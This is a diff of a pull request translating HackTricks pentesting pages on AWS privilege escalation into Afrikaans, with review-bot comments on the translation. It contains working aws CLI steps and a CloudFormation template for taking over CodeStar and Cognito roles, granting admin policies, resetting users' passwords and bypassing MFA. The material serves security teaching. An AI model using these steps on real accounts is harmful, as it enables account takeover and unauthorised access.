en om die boufase as **bevoegde gebruiker** te laat loop, dit is die konfigurasie wat die aanvaller benodig om te kompromenteer: ![](<../../../images/image (276).png>) @@ -26,16 +26,12 @@ During the **creation of the build project** you can indicate a **command to run ### ?`codebuild:UpdateProject, codepipeline:UpdatePipeline, codepipeline:StartPipelineExecution` -It might be possible to modify the role used and the command executed on a codepipeline with the previous permissions. +Dit mag moontlik wees om die rol wat gebruik word en die opdrag wat op 'n codepipeline uitgevoer word, met die vorige toestemmings te wysig. ### `codepipeline:pollforjobs` -[AWS mentions](https://docs.aws.amazon.com/codepipeline/latest/APIReference/API_PollForJobs.html): +[AWS noem](https://docs.aws.amazon.com/codepipeline/latest/APIReference/API_PollForJobs.html): -> When this API is called, CodePipeline **returns temporary credentials for the S3 bucket** used to store artifacts for the pipeline, if the action requires access to that S3 bucket for input or output artifacts. This API also **returns any secret values defined for the action**. +> Wanneer hierdie API aangeroep word, **gee CodePipeline tydelike geloofsbriewe vir die S3-bucket** wat gebruik word om artefakte vir die pipeline te stoor, indien die aksie toegang tot daardie S3-bucket vir invoer of uitvoer artefakte benodig. Hierdie API **gee ook enige geheime waardes wat vir die aksie gedefinieer is** terug. {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/README.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/README.md index 387c6ffff..870c5f76e 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/README.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/README.md 
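Review bot: In the codepipeline hunk (@@ -12,13) `kompromenteer` should be `kompromitteer` (it appears twice), and the sentence `is nie die Lys/Kry een wat benodig word om 'n codepipeline te skep nie` loses the original meaning: the English says the permissions listed are the ones needed apart from the List/Get permissions, so something like `sluit nie die List/Get-toestemmings in wat ook nodig is om 'n codepipeline te skep nie` would be clearer. IAM action prefixes such as `List`/`Get` should stay untranslated, as they are part of the permission names.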
@@ -4,7 +4,7 @@ ## Codestar -You can find more information about codestar in: +Jy kan meer inligting oor codestar vind in: {{#ref}} codestar-createproject-codestar-associateteammember.md @@ -12,7 +12,7 @@ codestar-createproject-codestar-associateteammember.md ### `iam:PassRole`, `codestar:CreateProject` -With these permissions you can **abuse a codestar IAM Role** to perform **arbitrary actions** through a **cloudformation template**. Check the following page: +Met hierdie toestemmings kan jy **misbruik maak van 'n codestar IAM Rol** om **arbitraire aksies** deur 'n **cloudformation sjabloon** uit te voer. Kyk na die volgende bladsy: {{#ref}} iam-passrole-codestar-createproject.md @@ -20,14 +20,13 @@ iam-passrole-codestar-createproject.md ### `codestar:CreateProject`, `codestar:AssociateTeamMember` -This technique uses `codestar:CreateProject` to create a codestar project, and `codestar:AssociateTeamMember` to make an IAM user the **owner** of a new CodeStar **project**, which will grant them a **new policy with a few extra permissions**. - +Hierdie tegniek gebruik `codestar:CreateProject` om 'n codestar projek te skep, en `codestar:AssociateTeamMember` om 'n IAM gebruiker die **eienaar** van 'n nuwe CodeStar **projek** te maak, wat hulle 'n **nuwe beleid met 'n paar ekstra toestemmings** sal gee. ```bash PROJECT_NAME="supercodestar" aws --profile "$NON_PRIV_PROFILE_USER" codestar create-project \ - --name $PROJECT_NAME \ - --id $PROJECT_NAME +--name $PROJECT_NAME \ +--id $PROJECT_NAME echo "Waiting 1min to start the project" sleep 60 
@@ -35,15 +34,14 @@ sleep 60 USER_ARN=$(aws --profile "$NON_PRIV_PROFILE_USER" opsworks describe-my-user-profile | jq .UserProfile.IamUserArn | tr -d '"') aws --profile "$NON_PRIV_PROFILE_USER" codestar associate-team-member \ - --project-id $PROJECT_NAME \ - --user-arn "$USER_ARN" \ - --project-role "Owner" \ - --remote-access-allowed +--project-id $PROJECT_NAME \ +--user-arn "$USER_ARN" \ +--project-role "Owner" \ +--remote-access-allowed ``` - If you are already a **member of the project** you can use the permission **`codestar:UpdateTeamMember`** to **update your role** to owner instead of `codestar:AssociateTeamMember` -**Potential Impact:** Privesc to the codestar policy generated. You can find an example of that policy in: +**PotensiĂ«le Impak:** Privesc na die codestar beleid wat gegenereer is. Jy kan 'n voorbeeld van daardie beleid vind in: {{#ref}} codestar-createproject-codestar-associateteammember.md 
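Review bot: In the codestar README hunks (@@ -20,14 and @@ -35,15) the context line `If you are already a **member of the project** you can use the permission ...` remains in English between translated paragraphs, so the section reads as half translated; translate it in this PR. `arbitraire aksies` in @@ -12,7 also differs from the `arbitrĂȘre` spelling used in the cloudformation page of the same PR; unify it. The `create-project` and `associate-team-member` command lines are changed only to drop their indentation, which should be reverted so the code stays identical to the source.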
@@ -51,27 +49,23 @@ codestar-createproject-codestar-associateteammember.md ### `codestar:CreateProjectFromTemplate` -1. **Create a New Project:** - - Utilize the **`codestar:CreateProjectFromTemplate`** action to initiate the creation of a new project. - - Upon successful creation, access is automatically granted for **`cloudformation:UpdateStack`**. - - This access specifically targets a stack associated with the `CodeStarWorker--CloudFormation` IAM role. -2. **Update the Target Stack:** - - With the granted CloudFormation permissions, proceed to update the specified stack. - - The stack's name will typically conform to one of two patterns: - - `awscodestar--infrastructure` - - `awscodestar--lambda` - - The exact name depends on the chosen template (referencing the example exploit script). -3. **Access and Permissions:** - - Post-update, you obtain the capabilities assigned to the **CloudFormation IAM role** linked with the stack. - - Note: This does not inherently provide full administrator privileges. Additional misconfigured resources within the environment might be required to elevate privileges further. +1. **Skep 'n Nuwe Projek:** +- Gebruik die **`codestar:CreateProjectFromTemplate`** aksie om die skepping van 'n nuwe projek te begin. +- Na suksesvolle skepping, word toegang outomaties toegestaan vir **`cloudformation:UpdateStack`**. +- Hierdie toegang teiken spesifiek 'n stapel wat geassosieer is met die `CodeStarWorker--CloudFormation` IAM rol. +2. **Werk die Teiken Stapel Op:** +- Met die toegewyde CloudFormation toestemmings, gaan voort om die gespesifiseerde stapel op te dateer. +- Die naam van die stapel sal tipies voldoen aan een van twee patrone: +- `awscodestar--infrastructure` +- `awscodestar--lambda` +- Die presiese naam hang af van die gekose sjabloon (verwys na die voorbeeld uitbuitingskrip). +3. **Toegang en Toestemmings:** +- Na die opdatering, verkry jy die vermoĂ«ns wat aan die **CloudFormation IAM rol** gekoppel is met die stapel. 
+- Let op: Dit bied nie inherent volle administrateur voorregte nie. Bykomende verkeerd geconfigureerde hulpbronne binne die omgewing mag benodig word om voorregte verder te verhoog. For more information check the original research: [https://rhinosecuritylabs.com/aws/escalating-aws-iam-privileges-undocumented-codestar-api/](https://rhinosecuritylabs.com/aws/escalating-aws-iam-privileges-undocumented-codestar-api/).\ You can find the exploit in [https://github.com/RhinoSecurityLabs/Cloud-Security-Research/blob/master/AWS/codestar_createprojectfromtemplate_privesc/CodeStarPrivEsc.py](https://github.com/RhinoSecurityLabs/Cloud-Security-Research/blob/master/AWS/codestar_createprojectfromtemplate_privesc/CodeStarPrivEsc.py) -**Potential Impact:** Privesc to cloudformation IAM role. +**PotensiĂ«le Impak:** Privesc na cloudformation IAM rol. {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/codestar-createproject-codestar-associateteammember.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/codestar-createproject-codestar-associateteammember.md index 0de95738e..8f5cf0c89 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/codestar-createproject-codestar-associateteammember.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/codestar-createproject-codestar-associateteammember.md 
@@ -2,84 +2,78 @@ {{#include ../../../../banners/hacktricks-training.md}} -This is the created policy the user can privesc to (the project name was `supercodestar`): - +Dit is die geskepte beleid waartoe die gebruiker kan privesc (die projeknaam was `supercodestar`): ```json { - "Version": "2012-10-17", - "Statement": [ - { - "Sid": "1", - "Effect": "Allow", - "Action": ["codestar:*", "iam:GetPolicy*", "iam:ListPolicyVersions"], - "Resource": [ - "arn:aws:codestar:eu-west-1:947247140022:project/supercodestar", - "arn:aws:events:eu-west-1:947247140022:rule/awscodestar-supercodestar-SourceEvent", - "arn:aws:iam::947247140022:policy/CodeStar_supercodestar_Owner" - ] - }, - { - "Sid": "2", - "Effect": "Allow", - "Action": [ - "codestar:DescribeUserProfile", - "codestar:ListProjects", - "codestar:ListUserProfiles", - "codestar:VerifyServiceRole", - "cloud9:DescribeEnvironment*", - "cloud9:ValidateEnvironmentName", - "cloudwatch:DescribeAlarms", - "cloudwatch:GetMetricStatistics", - "cloudwatch:ListMetrics", - "codedeploy:BatchGet*", - "codedeploy:List*", - "codestar-connections:UseConnection", - "ec2:DescribeInstanceTypeOfferings", - "ec2:DescribeInternetGateways", - "ec2:DescribeNatGateways", - "ec2:DescribeRouteTables", - "ec2:DescribeSecurityGroups", - "ec2:DescribeSubnets", - "ec2:DescribeVpcs", - "events:ListRuleNamesByTarget", - "iam:GetAccountSummary", - "iam:GetUser", - "iam:ListAccountAliases", - "iam:ListRoles", - "iam:ListUsers", - "lambda:List*", - "sns:List*" - ], - "Resource": ["*"] - }, - { - "Sid": "3", - "Effect": "Allow", - "Action": [ - "codestar:*UserProfile", - "iam:GenerateCredentialReport", - "iam:GenerateServiceLastAccessedDetails", - "iam:CreateAccessKey", - "iam:UpdateAccessKey", - "iam:DeleteAccessKey", - "iam:UpdateSSHPublicKey", - "iam:UploadSSHPublicKey", - "iam:DeleteSSHPublicKey", - "iam:CreateServiceSpecificCredential", - "iam:UpdateServiceSpecificCredential", - "iam:DeleteServiceSpecificCredential", - 
"iam:ResetServiceSpecificCredential", - "iam:Get*", - "iam:List*" - ], - "Resource": ["arn:aws:iam::947247140022:user/${aws:username}"] - } - ] +"Version": "2012-10-17", +"Statement": [ +{ +"Sid": "1", +"Effect": "Allow", +"Action": ["codestar:*", "iam:GetPolicy*", "iam:ListPolicyVersions"], +"Resource": [ +"arn:aws:codestar:eu-west-1:947247140022:project/supercodestar", +"arn:aws:events:eu-west-1:947247140022:rule/awscodestar-supercodestar-SourceEvent", +"arn:aws:iam::947247140022:policy/CodeStar_supercodestar_Owner" +] +}, +{ +"Sid": "2", +"Effect": "Allow", +"Action": [ +"codestar:DescribeUserProfile", +"codestar:ListProjects", +"codestar:ListUserProfiles", +"codestar:VerifyServiceRole", +"cloud9:DescribeEnvironment*", +"cloud9:ValidateEnvironmentName", +"cloudwatch:DescribeAlarms", +"cloudwatch:GetMetricStatistics", +"cloudwatch:ListMetrics", +"codedeploy:BatchGet*", +"codedeploy:List*", +"codestar-connections:UseConnection", +"ec2:DescribeInstanceTypeOfferings", +"ec2:DescribeInternetGateways", +"ec2:DescribeNatGateways", +"ec2:DescribeRouteTables", +"ec2:DescribeSecurityGroups", +"ec2:DescribeSubnets", +"ec2:DescribeVpcs", +"events:ListRuleNamesByTarget", +"iam:GetAccountSummary", +"iam:GetUser", +"iam:ListAccountAliases", +"iam:ListRoles", +"iam:ListUsers", +"lambda:List*", +"sns:List*" +], +"Resource": ["*"] +}, +{ +"Sid": "3", +"Effect": "Allow", +"Action": [ +"codestar:*UserProfile", +"iam:GenerateCredentialReport", +"iam:GenerateServiceLastAccessedDetails", +"iam:CreateAccessKey", +"iam:UpdateAccessKey", +"iam:DeleteAccessKey", +"iam:UpdateSSHPublicKey", +"iam:UploadSSHPublicKey", +"iam:DeleteSSHPublicKey", +"iam:CreateServiceSpecificCredential", +"iam:UpdateServiceSpecificCredential", +"iam:DeleteServiceSpecificCredential", +"iam:ResetServiceSpecificCredential", +"iam:Get*", +"iam:List*" +], +"Resource": ["arn:aws:iam::947247140022:user/${aws:username}"] +} +] } ``` - {{#include ../../../../banners/hacktricks-training.md}} - - - - 
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/iam-passrole-codestar-createproject.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/iam-passrole-codestar-createproject.md index 891d72df5..558a37cd6 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/iam-passrole-codestar-createproject.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/iam-passrole-codestar-createproject.md 
@@ -2,42 +2,39 @@ {{#include ../../../../banners/hacktricks-training.md}} -With these permissions you can **abuse a codestar IAM Role** to perform **arbitrary actions** through a **cloudformation template**. - -To exploit this you need to create a **S3 bucket that is accessible** from the attacked account. Upload a file called `toolchain.json` . This file should contain the **cloudformation template exploit**. The following one can be used to set a managed policy to a user under your control and **give it admin permissions**: +Met hierdie toestemmings kan jy **'n codestar IAM Rol misbruik** om **arbitraire aksies** deur 'n **cloudformation sjabloon** uit te voer. +Om dit te benut, moet jy 'n **S3-bucket skep wat toeganklik is** vanaf die aangevalde rekening. Laai 'n lĂȘer genaamd `toolchain.json` op. Hierdie lĂȘer moet die **cloudformation sjabloon uitbuiting** bevat. Die volgende kan gebruik word om 'n bestuurde beleid aan 'n gebruiker onder jou beheer toe te ken en **admin-toestemmings** te gee: ```json:toolchain.json { - "Resources": { - "supercodestar": { - "Type": "AWS::IAM::ManagedPolicy", - "Properties": { - "ManagedPolicyName": "CodeStar_supercodestar", - "PolicyDocument": { - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Action": "*", - "Resource": "*" - } - ] - }, - "Users": [""] - } - } - } +"Resources": { +"supercodestar": { +"Type": "AWS::IAM::ManagedPolicy", +"Properties": { +"ManagedPolicyName": "CodeStar_supercodestar", +"PolicyDocument": { +"Version": "2012-10-17", +"Statement": [ +{ +"Effect": "Allow", +"Action": "*", +"Resource": "*" +} +] +}, +"Users": [""] +} +} +} } ``` - -Also **upload** this `empty zip` file to the **bucket**: +Ook **laai** hierdie `leĂ« zip` lĂȘer op na die **houer**: {% file src="../../../../images/empty.zip" %} -Remember that the **bucket with both files must be accessible by the victim account**. 
- -With both things uploaded you can now proceed to the **exploitation** creating a **codestar** project: +Onthou dat die **houer met albei lĂȘers toeganklik moet wees deur die slagoffer rekening**. +Met albei dinge opgelaai kan jy nou voortgaan met die **uitbuiting** deur 'n **codestar** projek te skep: ```bash PROJECT_NAME="supercodestar" @@ -45,19 +42,19 @@ PROJECT_NAME="supercodestar" ## In this JSON the bucket and key (path) to the empry.zip file is used SOURCE_CODE_PATH="/tmp/surce_code.json" SOURCE_CODE="[ - { - \"source\": { - \"s3\": { - \"bucketName\": \"privesc\", - \"bucketKey\": \"empty.zip\" - } - }, - \"destination\": { - \"codeCommit\": { - \"name\": \"$PROJECT_NAME\" - } - } - } +{ +\"source\": { +\"s3\": { +\"bucketName\": \"privesc\", +\"bucketKey\": \"empty.zip\" +} +}, +\"destination\": { +\"codeCommit\": { +\"name\": \"$PROJECT_NAME\" +} +} +} ]" printf "$SOURCE_CODE" > $SOURCE_CODE_PATH 
@@ -65,28 +62,23 @@ printf "$SOURCE_CODE" > $SOURCE_CODE_PATH ## In this JSON the bucket and key (path) to the toolchain.json file is used TOOLCHAIN_PATH="/tmp/tool_chain.json" TOOLCHAIN="{ - \"source\": { - \"s3\": { - \"bucketName\": \"privesc\", - \"bucketKey\": \"toolchain.json\" - } - }, - \"roleArn\": \"arn:aws:iam::947247140022:role/service-role/aws-codestar-service-role\" +\"source\": { +\"s3\": { +\"bucketName\": \"privesc\", +\"bucketKey\": \"toolchain.json\" +} +}, +\"roleArn\": \"arn:aws:iam::947247140022:role/service-role/aws-codestar-service-role\" }" printf "$TOOLCHAIN" > $TOOLCHAIN_PATH # Create the codestar project that will use the cloudformation epxloit to privesc aws codestar create-project \ - --name $PROJECT_NAME \ - --id $PROJECT_NAME \ - --source-code file://$SOURCE_CODE_PATH \ - --toolchain file://$TOOLCHAIN_PATH +--name $PROJECT_NAME \ +--id $PROJECT_NAME \ +--source-code file://$SOURCE_CODE_PATH \ +--toolchain file://$TOOLCHAIN_PATH ``` - -This exploit is based on the **Pacu exploit of these privileges**: [https://github.com/RhinoSecurityLabs/pacu/blob/2a0ce01f075541f7ccd9c44fcfc967cad994f9c9/pacu/modules/iam\_\_privesc_scan/main.py#L1997](https://github.com/RhinoSecurityLabs/pacu/blob/2a0ce01f075541f7ccd9c44fcfc967cad994f9c9/pacu/modules/iam__privesc_scan/main.py#L1997) On it you can find a variation to create an admin managed policy for a role instead of to a user. +Hierdie exploit is gebaseer op die **Pacu exploit van hierdie voorregte**: [https://github.com/RhinoSecurityLabs/pacu/blob/2a0ce01f075541f7ccd9c44fcfc967cad994f9c9/pacu/modules/iam\_\_privesc_scan/main.py#L1997](https://github.com/RhinoSecurityLabs/pacu/blob/2a0ce01f075541f7ccd9c44fcfc967cad994f9c9/pacu/modules/iam__privesc_scan/main.py#L1997) Daarop kan jy 'n variasie vind om 'n admin bestuurde beleid vir 'n rol te skep in plaas van vir 'n gebruiker. {{#include ../../../../banners/hacktricks-training.md}} - - - - 
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.md index ddd0c1efd..774f1a6c4 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.md 
@@ -4,28 +4,27 @@ ## Cognito -For more info about Cognito check: +Vir meer inligting oor Cognito, kyk: {{#ref}} ../aws-services/aws-cognito-enum/ {{#endref}} -### Gathering credentials from Identity Pool +### Versameling van akrediteerbare uit Identiteitspoel -As Cognito can grant **IAM role credentials** to both **authenticated** an **unauthenticated** **users**, if you locate the **Identity Pool ID** of an application (should be hardcoded on it) you can obtain new credentials and therefore privesc (inside an AWS account where you probably didn't even have any credential previously). +Aangesien Cognito **IAM rol akrediteerbare** aan beide **geverifieerde** en **ongeverifieerde** **gebruikers** kan toeken, as jy die **Identiteitspoel ID** van 'n toepassing kan vind (dit behoort hardgecodeer te wees), kan jy nuwe akrediteerbare verkry en dus privesc (binne 'n AWS-rekening waar jy waarskynlik glad nie enige akrediteerbare gehad het nie). -For more information [**check this page**](../aws-unauthenticated-enum-access/#cognito). +Vir meer inligting [**kyk hierdie bladsy**](../aws-unauthenticated-enum-access/#cognito). -**Potential Impact:** Direct privesc to the services role attached to unauth users (and probably to the one attached to auth users). +**PotensiĂ«le Impak:** Direkte privesc na die dienste rol wat aan ongeverifieerde gebruikers geheg is (en waarskynlik na die een wat aan geverifieerde gebruikers geheg is). ### `cognito-identity:SetIdentityPoolRoles`, `iam:PassRole` -With this permission you can **grant any cognito role** to the authenticated/unauthenticated users of the cognito app. - +Met hierdie toestemming kan jy **enige cognito rol** aan die geverifieerde/ongeverifieerde gebruikers van die cognito toepassing toeken. ```bash aws cognito-identity set-identity-pool-roles \ - --identity-pool-id \ - --roles unauthenticated= +--identity-pool-id \ +--roles unauthenticated= # Get credentials ## Get one ID 
@@ -33,286 +32,243 @@ aws cognito-identity get-id --identity-pool-id "eu-west-2:38b294756-2578-8246-90 ## Get creds for that id aws cognito-identity get-credentials-for-identity --identity-id "eu-west-2:195f9c73-4789-4bb4-4376-99819b6928374" ``` +As die cognito-app **nie ongemagtigde gebruikers geaktiveer het nie**, mag jy ook die toestemming `cognito-identity:UpdateIdentityPool` nodig hĂȘ om dit te aktiveer. -If the cognito app **doesn't have unauthenticated users enabled** you might need also the permission `cognito-identity:UpdateIdentityPool` to enable it. - -**Potential Impact:** Direct privesc to any cognito role. +**PotensiĂ«le Impak:** Direkte privesc na enige cognito-rol. ### `cognito-identity:update-identity-pool` -An attacker with this permission could set for example a Cognito User Pool under his control or any other identity provider where he can login as a **way to access this Cognito Identity Pool**. Then, just **login** on that user provider will **allow him to access the configured authenticated role in the Identity Pool**. - +'n Aanvaller met hierdie toestemming kan byvoorbeeld 'n Cognito User Pool onder sy beheer stel of enige ander identiteitsverskaffer waar hy kan aanmeld as 'n **manier om toegang te verkry tot hierdie Cognito Identity Pool**. Dan, net **aanmeld** op daardie gebruikersverskaffer sal **hom toelaat om toegang te verkry tot die geconfigureerde gemagtigde rol in die Identity Pool**. 
```bash # This example is using a Cognito User Pool as identity provider ## but you could use any other identity provider aws cognito-identity update-identity-pool \ - --identity-pool-id \ - --identity-pool-name \ - [--allow-unauthenticated-identities | --no-allow-unauthenticated-identities] \ - --cognito-identity-providers ProviderName=user-pool-id,ClientId=client-id,ServerSideTokenCheck=false +--identity-pool-id \ +--identity-pool-name \ +[--allow-unauthenticated-identities | --no-allow-unauthenticated-identities] \ +--cognito-identity-providers ProviderName=user-pool-id,ClientId=client-id,ServerSideTokenCheck=false # Now you need to login to the User Pool you have configured ## after having the id token of the login continue with the following commands: # In this step you should have already an ID Token aws cognito-identity get-id \ - --identity-pool-id \ - --logins cognito-idp..amazonaws.com/= +--identity-pool-id \ +--logins cognito-idp..amazonaws.com/= # Get the identity_id from thr previous commnad response aws cognito-identity get-credentials-for-identity \ - --identity-id \ - --logins cognito-idp..amazonaws.com/= +--identity-id \ +--logins cognito-idp..amazonaws.com/= ``` - -It's also possible to **abuse this permission to allow basic auth**: - +Dit is ook moontlik om **hierdie toestemming te misbruik om basiese outentisering toe te laat**: ```bash aws cognito-identity update-identity-pool \ - --identity-pool-id \ - --identity-pool-name \ - --allow-unauthenticated-identities - --allow-classic-flow +--identity-pool-id \ +--identity-pool-name \ +--allow-unauthenticated-identities +--allow-classic-flow ``` - -**Potential Impact**: Compromise the configured authenticated IAM role inside the identity pool. +**PotensiĂ«le Impak**: Kompromitteer die geconfigureerde geverifieerde IAM-rol binne die identiteitspoel. 
### `cognito-idp:AdminAddUserToGroup` -This permission allows to **add a Cognito user to a Cognito group**, therefore an attacker could abuse this permission to add an user under his control to other groups with **better** privileges or **different IAM roles**: - +Hierdie toestemming laat toe om **'n Cognito-gebruiker aan 'n Cognito-groep toe te voeg**, daarom kan 'n aanvaller hierdie toestemming misbruik om 'n gebruiker onder sy beheer aan ander groepe met **beter** bevoegdhede of **verskillende IAM-rolle** toe te voeg: ```bash aws cognito-idp admin-add-user-to-group \ - --user-pool-id \ - --username \ - --group-name +--user-pool-id \ +--username \ +--group-name ``` - -**Potential Impact:** Privesc to other Cognito groups and IAM roles attached to User Pool Groups. +**PotensiĂ«le Impak:** Privesc na ander Cognito groepe en IAM rolle wat aan Gebruiker Pool Groepe gekoppel is. ### (`cognito-idp:CreateGroup` | `cognito-idp:UpdateGroup`), `iam:PassRole` -An attacker with these permissions could **create/update groups** with **every IAM role that can be used by a compromised Cognito Identity Provider** and make a compromised user part of the group, accessing all those roles: - +'n Aanvaller met hierdie toestemmings kan **groepe skep/opdateer** met **elke IAM rol wat deur 'n gecompromitteerde Cognito Identiteitsverskaffer gebruik kan word** en 'n gecompromitteerde gebruiker deel van die groep maak, wat toegang tot al daardie rolle verkry: ```bash aws cognito-idp create-group --group-name Hacked --user-pool-id --role-arn ``` - -**Potential Impact:** Privesc to other Cognito IAM roles. +**PotensiĂ«le Impak:** Privesc na ander Cognito IAM rolle. ### `cognito-idp:AdminConfirmSignUp` -This permission allows to **verify a signup**. By default anyone can sign in Cognito applications, if that is left, a user could create an account with any data and verify it with this permission. - +Hierdie toestemming laat toe om **'n aanmelding te verifieer**. 
Standaard kan enigiemand in Cognito toepassings aanmeld, as dit gelaat word, kan 'n gebruiker 'n rekening met enige data skep en dit met hierdie toestemming verifieer. ```bash aws cognito-idp admin-confirm-sign-up \ - --user-pool-id \ - --username +--user-pool-id \ +--username ``` - -**Potential Impact:** Indirect privesc to the identity pool IAM role for authenticated users if you can register a new user. Indirect privesc to other app functionalities being able to confirm any account. +**PotensiĂ«le Impak:** Indirekte privesc na die identiteitspoel IAM rol vir geverifieerde gebruikers as jy 'n nuwe gebruiker kan registreer. Indirekte privesc na ander app-funksies deur enige rekening te kan bevestig. ### `cognito-idp:AdminCreateUser` -This permission would allow an attacker to create a new user inside the user pool. The new user is created as enabled, but will need to change its password. - +Hierdie toestemming sal 'n aanvaller in staat stel om 'n nuwe gebruiker binne die gebruikerspoel te skep. Die nuwe gebruiker word as geaktiveer geskep, maar sal sy wagwoord moet verander. ```bash aws cognito-idp admin-create-user \ - --user-pool-id \ - --username \ - [--user-attributes ] ([Name=email,Value=email@gmail.com]) - [--validation-data ] - [--temporary-password ] +--user-pool-id \ +--username \ +[--user-attributes ] ([Name=email,Value=email@gmail.com]) +[--validation-data ] +[--temporary-password ] ``` - -**Potential Impact:** Direct privesc to the identity pool IAM role for authenticated users. Indirect privesc to other app functionalities being able to create any user +**PotensiĂ«le Impak:** Direkte privesc na die identiteitspoel IAM rol vir geverifieerde gebruikers. Indirekte privesc na ander app funksies deur enige gebruiker te kan skep. ### `cognito-idp:AdminEnableUser` -This permissions can help in. a very edge-case scenario where an attacker found the credentials of a disabled user and he needs to **enable it again**. 
- +Hierdie toestemmings kan help in 'n baie randgeval waar 'n aanvaller die akrediteer van 'n gedeaktiveerde gebruiker gevind het en hy moet dit **weer aktiveer**. ```bash aws cognito-idp admin-enable-user \ - --user-pool-id \ - --username +--user-pool-id \ +--username ``` - -**Potential Impact:** Indirect privesc to the identity pool IAM role for authenticated users and permissions of the user if the attacker had credentials for a disabled user. +**PotensiĂ«le Impak:** Indirekte privesc na die identiteitspoel IAM rol vir geverifieerde gebruikers en toestemmings van die gebruiker as die aanvaller kredensiale vir 'n gedeaktiveerde gebruiker gehad het. ### `cognito-idp:AdminInitiateAuth`, **`cognito-idp:AdminRespondToAuthChallenge`** -This permission allows to login with the [**method ADMIN_USER_PASSWORD_AUTH**](../aws-services/aws-cognito-enum/cognito-user-pools.md#admin_no_srp_auth-and-admin_user_password_auth)**.** For more information follow the link. +Hierdie toestemming laat toe om in te log met die [**metode ADMIN_USER_PASSWORD_AUTH**](../aws-services/aws-cognito-enum/cognito-user-pools.md#admin_no_srp_auth-and-admin_user_password_auth)**.** Vir meer inligting volg die skakel. ### `cognito-idp:AdminSetUserPassword` -This permission would allow an attacker to **change the password of any user**, making him able to impersonate any user (that doesn't have MFA enabled). - +Hierdie toestemming sou 'n aanvaller in staat stel om **die wagwoord van enige gebruiker te verander**, wat hom in staat stel om enige gebruiker na te doen (wat nie MFA geaktiveer het nie). ```bash aws cognito-idp admin-set-user-password \ - --user-pool-id \ - --username \ - --password \ - --permanent +--user-pool-id \ +--username \ +--password \ +--permanent ``` - -**Potential Impact:** Direct privesc to potentially any user, so access to all the groups each user is member of and access to the Identity Pool authenticated IAM role. 
+**PotensiĂ«le Impak:** Direkte privesc na potensieel enige gebruiker, sodat toegang tot al die groepe waartoe elke gebruiker behoort en toegang tot die Identiteitspoel geverifieerde IAM-rol. ### `cognito-idp:AdminSetUserSettings` | `cognito-idp:SetUserMFAPreference` | `cognito-idp:SetUserPoolMfaConfig` | `cognito-idp:UpdateUserPool` -**AdminSetUserSettings**: An attacker could potentially abuse this permission to set a mobile phone under his control as **SMS MFA of a user**. - +**AdminSetUserSettings**: 'n Aanvaller kan moontlik hierdie toestemming misbruik om 'n mobiele telefoon onder sy beheer as **SMS MFA van 'n gebruiker** in te stel. ```bash aws cognito-idp admin-set-user-settings \ - --user-pool-id \ - --username \ - --mfa-options +--user-pool-id \ +--username \ +--mfa-options ``` - -**SetUserMFAPreference:** Similar to the previous one this permission can be used to set MFA preferences of a user to bypass the MFA protection. - +**SetUserMFAPreference:** Soortgelyk aan die vorige een, kan hierdie toestemming gebruik word om MFA-voorkeure van 'n gebruiker in te stel om die MFA-beskerming te omseil. ```bash aws cognito-idp admin-set-user-mfa-preference \ - [--sms-mfa-settings ] \ - [--software-token-mfa-settings ] \ - --username \ - --user-pool-id +[--sms-mfa-settings ] \ +[--software-token-mfa-settings ] \ +--username \ +--user-pool-id ``` - -**SetUserPoolMfaConfig**: Similar to the previous one this permission can be used to set MFA preferences of a user pool to bypass the MFA protection. - +**SetUserPoolMfaConfig**: Soortgelyk aan die vorige een kan hierdie toestemming gebruik word om MFA-voorkeure van 'n gebruikerspoel in te stel om die MFA-beskerming te omseil. 
```bash aws cognito-idp set-user-pool-mfa-config \ - --user-pool-id \ - [--sms-mfa-configuration ] \ - [--software-token-mfa-configuration ] \ - [--mfa-configuration ] +--user-pool-id \ +[--sms-mfa-configuration ] \ +[--software-token-mfa-configuration ] \ +[--mfa-configuration ] ``` +**UpdateUserPool:** Dit is ook moontlik om die gebruikerspoel op te dateer om die MFA-beleid te verander. [Kyk cli hier](https://docs.aws.amazon.com/cli/latest/reference/cognito-idp/update-user-pool.html). -**UpdateUserPool:** It's also possible to update the user pool to change the MFA policy. [Check cli here](https://docs.aws.amazon.com/cli/latest/reference/cognito-idp/update-user-pool.html). - -**Potential Impact:** Indirect privesc to potentially any user the attacker knows the credentials of, this could allow to bypass the MFA protection. +**Potential Impact:** Indirekte privesc na potensieel enige gebruiker waarvan die aanvaller die akrediteeringe ken, dit kan toelaat om die MFA-beskerming te omseil. ### `cognito-idp:AdminUpdateUserAttributes` -An attacker with this permission could change the email or phone number or any other attribute of a user under his control to try to obtain more privileges in an underlaying application.\ -This allows to change an email or phone number and set it as verified. - +'n Aanvaller met hierdie toestemming kan die e-pos of telefoonnommer of enige ander attribuut van 'n gebruiker onder sy beheer verander om te probeer om meer voorregte in 'n onderliggende toepassing te verkry.\ +Dit maak dit moontlik om 'n e-pos of telefoonnommer te verander en dit as geverifieer in te stel. ```bash aws cognito-idp admin-update-user-attributes \ - --user-pool-id \ - --username \ - --user-attributes +--user-pool-id \ +--username \ +--user-attributes ``` - -**Potential Impact:** Potential indirect privesc in the underlying application using Cognito User Pool that gives privileges based on user attributes. 
